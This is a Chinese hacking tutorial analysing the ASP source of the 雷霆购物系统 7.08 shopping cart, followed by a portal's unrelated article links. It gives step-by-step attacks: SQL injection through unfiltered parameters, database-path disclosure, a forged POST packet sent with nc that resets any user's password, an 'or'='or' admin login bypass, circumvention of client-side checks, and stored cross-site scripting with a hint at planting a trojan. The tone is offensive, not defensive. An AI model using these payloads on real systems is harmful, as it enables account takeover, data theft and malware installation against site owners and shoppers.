雷霆购物系统的安全性如何?存在哪些sql注入漏洞?
雷霆购物系统是国内一个使用比较广泛的购物系统,现在,我们就来看看它的安全性究竟如何吧!从网上下载7.08最新版的雷霆购物系统,现在我们来分析代码!!
一、SQL注入漏洞
我们先来看看vpro.asp文件的部分漏洞代码:
<%
dim id
id=request.QueryString("id")
dim prename,company,intro,predate,graph2,description,remarks,price
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from product where id="&id,conn,1,3
rs("viewnum")=rs("viewnum") 1
rs.update
%>
sub.asp文件的漏洞代码:
sortsid=request.querystring("nid")
if Not isempty(request("page")) then
currentPage=Cint(request("page"))
else
currentPage=1
end if
set rs=server.CreateObject("adodb.recordset")
rs.open "select pagenum,name,mark,vipprice,discount,score,id,author,productdate,price2,price1,discount,pic from product where sortsid="&sortsid&" order by adddate desc",conn,1,1
还有rank.asp文件的漏洞代码:
dim id,action
action=request.QueryString("action")
id=request.QueryString("id")
set rs=server.CreateObject("adodb.recordset")
rs.open "select id,name,rank,ranknum from product where id="&id,conn,1,3 参数全都没有做过滤,用普通的注入工具就能轻松注入。
Search.asp这个文件我开始还以为是搜索页面,但是当我细读代码后,发现原来reseach.asp才是真正的搜索文件,其中又这样一段代码:
if name<>"" then
sql=sql&"and name like ’%"&name&"%’ "
end if
if author<>"" then
sql=sql&"and author like ’%"&author&"%’ "
end if
if manufacturer<>"" then
sql=sql&"and mark like ’%"&manufacturer&"%’ "
end if
if code<>"" then
sql=sql&"and categoryid like ’%"&code&"%’ "
这就是经典的填字游戏!!因为它在高级搜索页面作了javascript过滤,所以我们要用nc提交来进行cookies注入。但我们也可以在快速搜索页面提交:“504%’注入语句’P4”就能注入了,抓包然后把地址放在NBSI里就能注入了,因为我的IIS有点问题,所有就没深入测试。
二、爆库
数据库连接文件conn.asp并没有加入容错语句On Error Resume Next我们随便找一个带参数的地址,如:www.hackerxfiles.net/vpro.asp?id=513,我们就在地址栏里输入:www.hackerxfiles.net\vpro.asp?id=513,看数据库爆出来了吧! 三、cookies欺骗漏洞
Forget.asp是密码找回文件文件,repws.asp是修改密码文件,我们来看看它的部分代码:
<%
if request("username")="" then
call MsgBox("非法使用!","Back","None")
response.end
end if
dim tmp
set rs=server.CreateObject("adodb.recordset")
’提交修改密码
if not isempty(request("SubmitRePws")) then
if request("password")<>request("password2") then call MsgBox("再次输入密码不一致!","Back","None")
rs.open "select password from [user] where username=’"&trim(request("username"))&"’",conn,1,3
rs("password")=md5(trim(request("password2")))
rs.update
rs.close
call MsgBox("您的密码取回成功,请登录!","GoUrl","login.asp")
response.end
end if
rs.open "select answer from [user] where username=’"&trim(request("username"))&"’ ",conn,1,1
tmp=trim(rs("answer"))
rs.close
if tmp<>md5(request("answer")) then
call Msgbox("对不起,您输入的问题答案不正确","Back","None")
response.end
end if
set rs=nothing
%>
呵呵,笑了吧!我们现在来构造数据包:
POST /lt/repws.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost/lt/repws.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Host: localhost
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOF
password=121212&password2=121212&SubmitRePws=提交&username=x-key
修改就把ueername和password、possword2还有Content-Length修改一下就行了,其他的都不用改。我们现在用nc提交:nc localhost 80<1.txt>1.htm,如图3所示,然后我们运行一下1.htm,就会看到图4的消息框了!
四、跨站漏洞
注册文件reg.asp只是在页面表面用了javascript做了过滤,我们可以把它保存到本地,然后删除javascript验证就能注册了呵呵,注册的所有参数都完全没有做过滤哦!!在里面添任何东西都可以,但是这又有什么用呢?那么这就是要看你的工程学了。
我们来看看留言本的login.asp的漏洞代码:sqlchk="select * from admin where admin=’" & Username & "’ and password=’" & password & "’"呵呵,用经典的’or’=’or’就能进入了,但是,页面做了javascript验证,但是这个验证就能阻止我们吗?呵呵,当然不能,绕过javascript验证的方法前面已经讲过了,这里就不重复了!
我们只要先抓包,然后用nc这样提交就行了nc localhost 80<1.txt>1.htm好了,现在我们就可以打开1.htm了!!
我们再来看看write.asp文件,我们打开该页面在“电子邮件”或者“个人主页”中输入跨站代码:">
<",就能看到我们想要的效果了!如果我们再勾上“只有斑竹才可以看”,呵呵,挂个马什么的不就……
怎么用arp欺骗辅助嗅探?怎么实现改变b的数据流向?
嗅探在集线器盛行的年代可简单实现你什么事情都不用干,集线器自动会把别人的数据包往你机器上发。但是那个年代已经过去了,现在交换机已经代替集线器成为组建局域网的重要设备,而交换机不会再把不属于你的包转
详情2018-02-15 08:58:58责编:llp 来源:驱动管家discuz安全提问是如何加密的?discuz安全提问加密的原理是什么?
今天朋友问我discuz安全提问答案能不能饶过去。或者破解,我以前就注意过个密码,只记得很短,以为是substr取的MD5,最后看了半天的源码,确实是MD5加密的,不过,加密的过程有点晕加密过程是value的值先加密一次
详情2018-02-12 12:27:16责编:llp 来源:驱动管家PaaS安全问题 同PaaS提供商签订合同应该考虑哪些问题?
为了避免基础架构即服务(IaaS)的安全问题,很多担心安全的企业使用一个简单的解决方案:在它们进入云端之前加密对象。不幸的是,这种方法对于减缓平台即服务(PaaS)的安全问题并不是最优的方案。PaaS创造了数
详情2018-02-24 18:18:40责编:llp 来源:驱动管家电脑文件夹怎么加密?电脑加密需要走这三步
很多时候出于安全方面的考虑,无论是家庭用户还是企业用户,电脑中都会或多或少有一些重要数据,系统崩溃了可以重装,硬件损坏了可以再去买,但如果是数据被泄密,那带来的损失就无法估计了。除了及时做好备份外
详情2018-01-28 08:58:15责编:llp 来源:驱动管家- 详情2018-02-14 18:28:57责编:llp 来源:驱动管家
网站安全检测工具 appscan的使用教程是什么?
本文由阿德马翻译自国外网站,尊重劳动成果,转载请注明出处,谢谢 本文将详细介绍Appscan功能选项设置的细节,适合E文一般,初次接触Appscan的童鞋参考阅读 Appscan是web应用程序渗透测试舞台上使用最广泛的工具之一
详情2018-01-28 16:47:16责编:llp 来源:驱动管家不想电脑中毒怎么做?用users组用户修改注册表的方法
看了你昨天的留言,我才知道原来木马可以用这么多方式传播呀。那我想问你一件事,常在河边走,哪有不湿鞋,你经常黑别人,难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢?就像你说的那样,我也中过木马,
详情2018-02-16 08:50:36责编:llp 来源:驱动管家入侵网站有哪些手段?怎么避免发生网站入侵?
目前网络上的病毒、木马日益增多,更为严重的是有一些为谋取私人利益的间谍软件、广告程序都可能对我们的计算机造成危害,甚至有的软件被人利用,还可达到跟木马入侵的同样效果。因此你作为一个精明的电脑用户,
详情2018-01-28 14:27:26责编:llp 来源:驱动管家mcafee企业版8.8怎么设置规则防范病毒?
McAfee大企业版规则之强,天诺时空现有规则之厉,相信大家已有所见闻与实践。但是否真的滴水不漏、固若金汤,相信谁也不敢妄言。本教程力图充分利用咖啡规则现有语法特点,引导有一定基础的新手和有兴趣的朋友构
详情2018-01-21 09:02:39责编:llp 来源:驱动管家不是以下载器为目的磁碟机病毒如何查杀?杜绝磁碟机病毒的方法
电脑互联网的逐步递增趋势,导致现在的电脑病毒也开始飞速的发展起来,无疑这对我们的正常使用电脑是种不小的打击。而前几年出现的新型电脑磁盘机病毒,让很多使用电脑的用户头疼不以,那么针对这类的病毒要如何
详情2018-01-29 11:00:31责编:llp 来源:驱动管家
- 为什么黑客需要使用pwdump?怎样防止系统密码档被黑客dump?
- Win10怎么备份?Win10系统驱动备份的操作方法
- 使用手机QQ浏览器wifi助手怎么连接wifi?wifi助手使用方法详解
- 电脑版的手机助手老是自动弹出怎么禁止
- 数码相机电池贵不贵?数码相机电池的具体介绍
- iphone5电池的这些保养技巧你了解了多少
- ICO要革了VC的命?听听这些投资人说了什么
- 用usb启动盘还原系统的时候安装失败怎么解决
- win7系统中配置中的自动还原卡步骤是怎样的
- 星星2号和星星1号区别是什么?买哪个更好?
- 锤子手机是什么?锤子手机基本配置怎么样?
- 微软我们网页版玩法 Twins Or Not测试人脸相似度
- u盘只读怎么修改 u盘设置只读模式的方法
- 人生日历如何抢退票漏票 人生日历抢火车票攻略
- gg助手下载文件夹的路径在什么地方?怎么查看
- 小米移动电源松下电池版怎么拆解?小米移动电源松下电池评测
- 微型摄像头最简单的使用方法介绍
- 亚马逊获5星好评:美国11岁男孩为让世人理解比特币出书
- 怎么一键还原win10系统?还原win10系统的方法
- 电脑出现蓝屏代码0x0000007e故障是什么原因?怎么处理